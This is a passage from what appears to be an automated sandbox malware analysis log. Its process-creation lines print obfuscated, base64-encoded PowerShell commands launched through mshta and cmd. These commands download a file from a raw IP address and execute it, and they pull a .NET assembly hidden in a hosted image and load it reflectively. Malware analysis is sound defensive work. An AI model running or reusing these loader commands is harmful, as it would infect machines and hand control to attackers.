mb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c